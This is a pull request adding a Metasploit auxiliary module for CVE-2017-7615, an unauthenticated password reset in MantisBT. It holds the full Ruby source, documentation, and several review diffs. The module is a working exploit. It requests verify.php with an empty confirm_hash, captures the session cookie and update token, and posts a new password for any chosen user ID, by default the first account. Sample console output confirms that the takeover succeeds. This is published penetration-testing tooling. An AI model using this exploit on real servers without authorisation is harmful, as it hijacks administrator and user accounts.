### PR TITLE
Add a module for CVE-2017-7615

### DIFF
--- a/documentation/modules/auxiliary/admin/http/mantisbt_password_reset.md
+++ b/documentation/modules/auxiliary/admin/http/mantisbt_password_reset.md
@@ -1,0 +1,30 @@
+## Vulnerable Application
+
+MantisBT before 1.3.10, 2.2.4, and 2.3.1, that can be downloaded
+on
+[Sourceforge](https://sourceforge.net/projects/mantisbt/files/mantis-stable/).
+
+## Verification Steps
+
+  1. Install the vulnerable software
+  2. Start msfconsole
+  3. Do: ```use auxiliary/admin/http/mantisbt_password_reset```
+  4. Do: ```set rhost```
+  5. Do: ```run```
+  6. If the system is vulnerable, the module should tell you that the password
+     was successfulyl changed.
+
+## Scenarios
+
+  ```
+   msf > use auxiliary/admin/http/mantisbt_password_reset
+   msf auxiliary(mantisbt_password_reset) > set rport 8082
+   rport => 8082
+   msf auxiliary(mantisbt_password_reset) > set rhost 127.0.0.1
+   rhost => 127.0.0.1
+   msf auxiliary(mantisbt_password_reset) > run
+   
+   [+] Password successfully changed to 'ndOQTmhQ'.
+   [*] Auxiliary module execution completed
+   msf auxiliary(mantisbt_password_reset) > 
+  ```

--- a/documentation/modules/auxiliary/admin/http/mantisbt_password_reset.md
+++ b/documentation/modules/auxiliary/admin/http/mantisbt_password_reset.md
@@ -12,7 +12,7 @@ on
   4. Do: ```set rhost```
   5. Do: ```run```
   6. If the system is vulnerable, the module should tell you that the password
-     was successfulyl changed.
+     was successfully changed.
 
 ## Scenarios
 

--- a/modules/auxiliary/admin/http/mantisbt_password_reset.rb
+++ b/modules/auxiliary/admin/http/mantisbt_password_reset.rb
@@ -26,7 +26,7 @@ class MetasploitModule < Msf::Auxiliary
           ['URL', 'http://hyp3rlinx.altervista.org/advisories/MANTIS-BUG-TRACKER-PRE-AUTH-REMOTE-PASSWORD-RESET.txt']
         ],
       'Platform'     => ['win', 'linux'],
-      'DisclosureDate' => "Apr 16, 2017"))
+      'DisclosureDate' => "Apr 16 2017"))
 
       register_options(
         [
@@ -44,7 +44,7 @@ class MetasploitModule < Msf::Auxiliary
         'method'=>'GET'
       })
 
-      if res and res.body and res.body.include? 'Powered by <a href="http://www.mantisbt.org" title="bug tracking software">MantisBT'
+      if res && res.body && res.body.include? 'Powered by <a href="http://www.mantisbt.org" title="bug tracking software">MantisBT'
         vprint_status("MantisBT detected")
         return Exploit::CheckCode::Detected
       else
@@ -68,8 +68,8 @@ class MetasploitModule < Msf::Auxiliary
       }
     })
 
-    if !res or !res.body
-      fail_with(Failure::UnexpectedReply, "Error in server resonse. Ensure the server IP is correct.")
+    if !res || !res.body
+      fail_with(Failure::UnexpectedReply, "Error in server response. Ensure the server IP is correct.")
     end
 
     cookie = res.get_cookies
@@ -104,10 +104,10 @@ class MetasploitModule < Msf::Auxiliary
       'cookie' => cookie
     })
 
-    if res and res.body and res.body.include? 'Password successfully updated'
+    if res && res.body && res.body.include? 'Password successfully updated'
       print_good("Password successfully changed to '#{password}'.")
     else
-      fail_with(Failure::UnexpectedReply, 'Something went wrong, the password was not changed')
+      fail_with(Failure::UnexpectedReply, 'Something went wrong, the password was not changed.')
     end
   end
 end

--- a/modules/auxiliary/admin/http/mantisbt_password_reset.rb
+++ b/modules/auxiliary/admin/http/mantisbt_password_reset.rb
@@ -21,7 +21,9 @@ class MetasploitModule < Msf::Auxiliary
       'References'   =>
         [
           ['CVE', '2017-7615'],
+          ['EDB', '41890'],
           ['URL', 'https://mantisbt.org/bugs/view.php?id=22690']
+					['URL', 'http://hyp3rlinx.altervista.org/advisories/MANTIS-BUG-TRACKER-PRE-AUTH-REMOTE-PASSWORD-RESET.txt']
         ],
       'Platform'     => ['win', 'linux'],
       'Privileged'   => false,

--- a/modules/auxiliary/admin/http/mantisbt_password_reset.rb
+++ b/modules/auxiliary/admin/http/mantisbt_password_reset.rb
@@ -23,10 +23,9 @@ class MetasploitModule < Msf::Auxiliary
           ['CVE', '2017-7615'],
           ['EDB', '41890'],
           ['URL', 'https://mantisbt.org/bugs/view.php?id=22690']
-                    ['URL', 'http://hyp3rlinx.altervista.org/advisories/MANTIS-BUG-TRACKER-PRE-AUTH-REMOTE-PASSWORD-RESET.txt']
+          ['URL', 'http://hyp3rlinx.altervista.org/advisories/MANTIS-BUG-TRACKER-PRE-AUTH-REMOTE-PASSWORD-RESET.txt']
         ],
       'Platform'     => ['win', 'linux'],
-      'Privileged'   => false,
       'DisclosureDate' => "Apr 16, 2017"))
 
       register_options(
@@ -93,7 +92,7 @@ class MetasploitModule < Msf::Auxiliary
       'vars_post' => {
           'verify_user_id' => datastore['USERID'],
           'account_update_token' => $1,
-          'realname' => 'jvoisin',
+          'realname' => Rex::Text.rand_text_alpha(rand(5) + 8),
           'password' => password,
           'password_confirm' => password
         },

--- a/modules/auxiliary/admin/http/mantisbt_password_reset.rb
+++ b/modules/auxiliary/admin/http/mantisbt_password_reset.rb
@@ -1,0 +1,107 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+## Current source: https://github.com/rapid7/metasploit-framework
+###
+
+class MetasploitModule < Msf::Auxiliary
+  include Msf::Exploit::Remote::HttpClient
+
+  def initialize(info={})
+    super(update_info(info,
+      'Name'       => "MantisBT password reset",
+      'Description'  => %q{
+        MantisBT before 1.3.10, 2.2.4, and 2.3.1 are vulnerable to unauthenticated password reset.
+      },
+      'License'    => MSF_LICENSE,
+      'Author'     =>
+        [
+          'John (hyp3rlinx) Page',  # initial discovery
+          'Julien (jvoisin) Voisin' # metasploit module
+        ],
+      'References'   =>
+        [
+          ['CVE', '2017-7615'],
+          ['URL', 'https://mantisbt.org/bugs/view.php?id=22690']
+        ],
+      'Platform'     => ['win', 'linux'],
+      'Privileged'   => false,
+      'DisclosureDate' => "Apr 16, 2017"))
+
+      register_options(
+        [
+          OptString.new('USERID', [ true, 'User id to reset', 1]),
+          OptString.new('PASSWORD', [ false, 'The new password to set (blank for random)', '']),
+          OptString.new('TARGETURI', [ true, 'Relative URI of MantisBT installation', '/'])
+        ]
+			)
+  end
+
+  def check
+    begin
+      res = send_request_cgi({
+        'uri' => normalize_uri(target_uri.path, '/login_page.php'),
+        'method'=>'GET'
+      })
+
+      if res and res.body and res.body.include? 'Powered by <a href="http://www.mantisbt.org" title="bug tracking software">MantisBT'
+        vprint_status("MantisBT detected")
+        return Exploit::CheckCode::Detected
+      else
+        vprint_status("Not a MantisBT Instance!")
+        return Exploit::CheckCode::Safe
+      end
+
+    rescue Rex::ConnectionRefused
+      print_error("Connection refused by server.")
+      return Exploit::CheckCode::Safe
+    end
+  end
+
+  def run
+    res = send_request_cgi({
+      'uri' => normalize_uri(target_uri.path, '/verify.php'),
+      'method' => 'GET',
+      'vars_get' => {
+        'id' => datastore['USERID'],
+        'confirm_hash' => ''
+      }
+    })
+
+    if !res or !res.body
+      fail_with(Failure::UnexpectedReply, "Error in server resonse. Ensure the server IP is correct.")
+    end
+
+    cookie = res.get_cookies
+
+    if cookie == '' || !(res.body.include? 'Your account information has been verified.')
+      fail_with(Failure::NoAccess, "Authentication failed")
+    end
+
+
+    if datastore['PASSWORD'].blank?
+      password = Rex::Text.rand_text_alpha(8)
+    else
+      password = datastore['PASSWORD']
+    end
+
+    res.body =~ /<input type="hidden" name="account_update_token" value="([a-zA-Z0-9_-]+)"/
+    res = send_request_cgi({
+      'uri' => normalize_uri(target_uri.path, '/account_update.php'),
+      'method' => 'POST',
+      'vars_post' => {
+          'verify_user_id' => datastore['USERID'],
+          'account_update_token' => $1,
+          'realname' => 'jvoisin',
+          'password' => password,
+          'password_confirm' => password
+        },
+      'cookie' => cookie
+    })
+
+    if res and res.body and res.body.include? 'Password successfully updated'
+      print_good("Password successfully changed to '#{password}'.")
+    else
+      fail_with(Failure::UnexpectedReply, 'Something went wrong, the password was not changed')
+    end
+  end
+end

--- a/modules/auxiliary/admin/http/mantisbt_password_reset.rb
+++ b/modules/auxiliary/admin/http/mantisbt_password_reset.rb
@@ -22,7 +22,7 @@ class MetasploitModule < Msf::Auxiliary
         [
           ['CVE', '2017-7615'],
           ['EDB', '41890'],
-          ['URL', 'https://mantisbt.org/bugs/view.php?id=22690']
+          ['URL', 'https://mantisbt.org/bugs/view.php?id=22690'],
           ['URL', 'http://hyp3rlinx.altervista.org/advisories/MANTIS-BUG-TRACKER-PRE-AUTH-REMOTE-PASSWORD-RESET.txt']
         ],
       'Platform'     => ['win', 'linux'],

--- a/modules/auxiliary/admin/http/mantisbt_password_reset.rb
+++ b/modules/auxiliary/admin/http/mantisbt_password_reset.rb
@@ -85,7 +85,12 @@ class MetasploitModule < Msf::Auxiliary
       password = datastore['PASSWORD']
     end
 
-    res.body =~ /<input type="hidden" name="account_update_token" value="([a-zA-Z0-9_-]+)"/
+    if res.body =~ /<input type="hidden" name="account_update_token" value="([a-zA-Z0-9_-]+)"/
+      token = $1
+    else
+      fail_with(Failure::UnexpectedReply, 'Could not retrieve account_update_token')
+    end
+
     res = send_request_cgi({
       'uri' => normalize_uri(target_uri.path, '/account_update.php'),
       'method' => 'POST',

--- a/modules/auxiliary/admin/http/mantisbt_password_reset.rb
+++ b/modules/auxiliary/admin/http/mantisbt_password_reset.rb
@@ -44,7 +44,7 @@ class MetasploitModule < Msf::Auxiliary
         'method'=>'GET'
       })
 
-      if res && res.body && res.body.include? 'Powered by <a href="http://www.mantisbt.org" title="bug tracking software">MantisBT'
+      if res && res.body && res.body.include?('Powered by <a href="http://www.mantisbt.org" title="bug tracking software">MantisBT')
         vprint_status("MantisBT detected")
         return Exploit::CheckCode::Detected
       else
@@ -104,7 +104,7 @@ class MetasploitModule < Msf::Auxiliary
       'cookie' => cookie
     })
 
-    if res && res.body && res.body.include? 'Password successfully updated'
+    if res && res.body && res.body.include?('Password successfully updated')
       print_good("Password successfully changed to '#{password}'.")
     else
       fail_with(Failure::UnexpectedReply, 'Something went wrong, the password was not changed.')

--- a/modules/auxiliary/admin/http/mantisbt_password_reset.rb
+++ b/modules/auxiliary/admin/http/mantisbt_password_reset.rb
@@ -23,7 +23,7 @@ class MetasploitModule < Msf::Auxiliary
           ['CVE', '2017-7615'],
           ['EDB', '41890'],
           ['URL', 'https://mantisbt.org/bugs/view.php?id=22690']
-					['URL', 'http://hyp3rlinx.altervista.org/advisories/MANTIS-BUG-TRACKER-PRE-AUTH-REMOTE-PASSWORD-RESET.txt']
+                    ['URL', 'http://hyp3rlinx.altervista.org/advisories/MANTIS-BUG-TRACKER-PRE-AUTH-REMOTE-PASSWORD-RESET.txt']
         ],
       'Platform'     => ['win', 'linux'],
       'Privileged'   => false,
@@ -35,7 +35,7 @@ class MetasploitModule < Msf::Auxiliary
           OptString.new('PASSWORD', [ false, 'The new password to set (blank for random)', '']),
           OptString.new('TARGETURI', [ true, 'Relative URI of MantisBT installation', '/'])
         ]
-			)
+      )
   end
 
   def check


### PR DESCRIPTION
Add a module for CVE-2017-7615, aka an unauthenticated password reset in MantisBT.

## Verification

List the steps needed to make sure this thing works

- [x] Setup MantisBT (you can get the version 1.3.0 [here]( https://github.com/rapid7/metasploit-framework/files/1133460/mantisbt-1.3.0.tar.gz) or from sourceforge)
- [x] Start `msfconsole`
- [x] `use auxiliary/admin/http/mantisbt_password_reset`
- [x] `set RHOST <target IP>`
- [x] **Verify** that the module outputs `[+] Password successfully changed to …`
- [x] **Verify** that the password works

